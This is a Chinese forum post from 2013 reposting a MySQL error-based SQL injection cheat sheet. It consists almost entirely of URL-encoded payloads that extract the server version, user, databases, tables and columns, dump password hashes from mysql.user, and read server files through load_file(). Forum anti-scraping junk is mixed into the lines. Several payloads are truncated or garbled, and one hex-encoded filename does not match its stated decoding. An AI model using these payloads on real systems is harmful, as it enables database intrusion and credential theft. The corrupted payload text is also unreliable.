Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
0 g5 |- n. j: C$ i7 @
' ?% T) g  w7 Y6 P' z' d4 Y
Mysql暴错注入参考（pdf），每天一贴。。。

2 S0 Q$ R$ f; }" {MySql Error Based Injection Reference
[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
9 N) ?; q5 {( R# J* oMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
: S' y) b1 C3 W! y; t7 h5 D% Qup by a)b)
. U' O8 Q3 l) W5 G查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
- T& z7 ^* T+ v3 O( f* s) ]Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
3 x! P' P2 r( r& R' ~查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
" d( l; A8 N5 A, f! O/ ]Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
+ c) l* j* f4 j$ b2 _# s; v) ^8 tor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
* _) ~3 H3 |9 s3 z# r, p; E依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
& C6 K1 c$ ?, S# J' u1 l5 j顺序替换
爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
7 X3 ]1 v& P+ i8 M4 yable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
' x! G: Q0 a8 o+ `1 [( m+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
7 e/ S, ~; J# m7 |8 V" h2 \bles+group+by+x)a)+and+1=1
# z( `( B9 o% z4 l1 H; F0x6D7973716C=Mysql 将n顺序替换
- M  J2 \4 `* C& b% n* ]: A4 k1 x爆表内字段数目:
; s5 r/ w8 _0 J: r4 Land+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
- X- T0 _" L6 y' Y, p+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
+ M* P& R$ k% P8 ?  r/ Z2 ~and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
* [* J* }- C6 c) L6 W# }loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
2 G. b1 s, d! {9 m依次暴内容:
1 F' ~7 n  p5 O0 r9 `and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
' D7 q1 @& ^8 ]% T2 `4 Yma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
1 e. P- l) d& E! j6 n' G' a" y爆文件内容:
% q% N! H& u: r! @% b3 W/ w( Wand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
" r( ^, P% v! J+ H8 ?6 DThx for reading.

% g' n3 X$ @) V8 I( I不要下载也可以，